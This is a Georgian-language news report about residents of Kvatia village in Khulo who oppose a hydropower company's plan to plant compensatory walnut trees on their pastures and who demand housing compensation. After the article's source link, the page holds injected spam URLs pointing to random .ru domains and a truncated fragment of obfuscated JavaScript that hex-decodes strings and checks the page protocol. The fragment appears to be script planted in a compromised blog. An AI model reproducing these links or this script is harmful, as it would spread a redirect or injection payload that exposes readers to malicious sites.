ცირა გვასალია
სპეციალური ჭრის ნებართვის შედეგად მოჭრილი წითელი ნუსხის ხეების საკომპენსაციოდ, კომპანია “აჭარისწყალ ჯორჯიამ” ხულოს მუნიციპალიტეტის სოფელ კვატიაში გადაწყვიტა კაკლების დარგვა. სოფელ კვატიას მცხოვრებლები არ ეთანხმებიან ამ გადაწყვეტილებას.
სოფელ კვატიას მცხოვრებლები კომპენსაციას ითხოვენ. ისინი ამბობენ, რომ მათ მეზობელ სოფელ წაბლანას კომპანიამ და აჭარის მთავრობამ გადაუხადა კომპენსაცია; სოფელ კვატიას მცხოვრებლები კი უყურადღებოდ დარჩენენ.
“ვითხოვთ ბინებს”, – ამბობს რამაზ ბერიძე.
სოფლის მცოვრებლები ამბობენ, რომ “აჭარისწყალ ჯორჯიას” საქმიანობა გავლენას მოახდენს მათ ცხოვრებაზე. სოფელთან დაგუბდება წყალი. გავა მაღალი ძაბვის ხაზები. დაინგრევა პატარა ხიდი, რომელიც სოფლის ერთ ხეობას მეორესთან აერთებს.
სოფელ კვატიას მცხოვრები რამაზ ბერიძე ამბობს, რომ იმ ადგილზე, სადაც კომპანიას საკომპენსაციო კაკლების დარგვა უნდა, მცხოვრებლების ცხოველების საძოვრების ნაწილია. კაკლების დარგვის შემთხვევაში, კომპანიას ტერიტორიის შემოსაზღვრა მოუწევს და ეს უფრო შეამცირებს მათი საძოვრების ფართობს.
შუახევი-ჰესის მშენებლობის ფარგლებში, საქართველოს მთავრობამ “აჭარისწყალ ჯორჯიას” წითელი ნუსხის 1,410 ხის მოჭრის უფლება მისცა. ამის სანაცვლოდ, კომპანიამ საკომპენსაციოდ სხვაგან უნდა დარგოს იგივე სახეობის ხეები. სოფელი კვატია ერთ-ერთი ადგილია, სადაც კომპანიამ კაკლების ნერგების დარგვა გადაწყვიტა. თუმცა, მოსახლეობის წინააღმდეგობის გამო, კომპანია განაშენიანებას ჯერ-ჯერობით ვერ ახერხებს.
როცა კომპანია ამა თუ იმ პროექტის განხორციელების ფარგლებში წითელი ნუსხის სახეობის ხეების მოჭრის სპეციალურ უფლებას იღებს, ის ვალდებულია საკომპენსაციოდ სხვაგან დარგოს იმავე სახეობის ხეები. ამისთვის კომპანია გარემოსა და ბუნებრივი რესურსების დაცვის სამინისტროში წარადგენს შემარბილებელი ღონისძიებების გეგმას. გეგმაში გაწერილია კომპანიის განაშენიანების ხედვა.
შემარბილებელი ღონისძიებების გეგმაში, რომელიც “აჭარისწყალ ჯორჯიამ” გარემოსა და ბუნებრივი რესურსების დაცვის სამინისტროში წარადგინა, არ იყო მითითებული ის ადგილები, სადაც მოჭრილი ხეების სანაცვლოდ მოხდება განაშენიანება.
კომპანია “აჭარისწყალ ჯორჯიას” საზოგადოებასთან ურთიერთობის სამსახურის უფროსის, იზაბელა გოცაძის თქმით, ნერგების დასარგავი ტერიტორიები გარემოს დაცვის სამინისტროსთან ამჟამად თანხმდება.
“ამ ეტაპზე მიმდინარეობს აქტიური მუშაობა ტერიტორიების შერჩევის მიზნით”, – აღნიშნა გოცაძემ ელექტრონული მეილით მოწერილ პასუხში. – “დარგვების განხორციელება იგეგმება სამშენებლო სამუშაოების დასრულებისთანავე, 2017 წლის პირველ კვარტალში.”
რამაზ ბერიძე: “არც არჩევნებს ჩავატარებინებთ, მთავარი ძაბვის ხაზები მოდის – არც მაგას გავაკეთებინებთ. ყველაფერს გავაპროტესტებთ. რაც ჩვენ არ წაგვადგება, კვატიას ტერიტორიაზე არანაირ სამუშაოს არ ჩავატარებინებთ”
გურამ ბერიძე: “აქ თუ მართლა წყალი დაგუბდა, სად წავიდეს აქაური ხალხი? მეზობელ სოფელს თუ ეკუთვნის ბინა, ჩვენ რატომ არ გვეკუთვნის? მეტი ზიანი ჩვენს სოფელს აქვს.”
http://occrpcaucasus.org/project/%E1%83%A1%E1%83%9D%E1%83%A4%E1%83%94%E1%83%9A-%E1%83%99%E1%83%95%E1%83%90%E1%83%A2%E1%83%98%E1%83%90%E1%83%A1-%E1%83%AE%E1%83%A3%E1%83%9A%E1%83%9D-%E1%83%9B%E1%83%9D%E1%83%A1%E1%83%90%E1%83%AE/https://wek7ipqx359.ru/f2.html?a=26482https://lukpiot0dz.ru/u.html?a=26482
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://wek7ipqx359.ru/f2.html?a=26482https://lukpiot0dz.ru/u.html?a=26482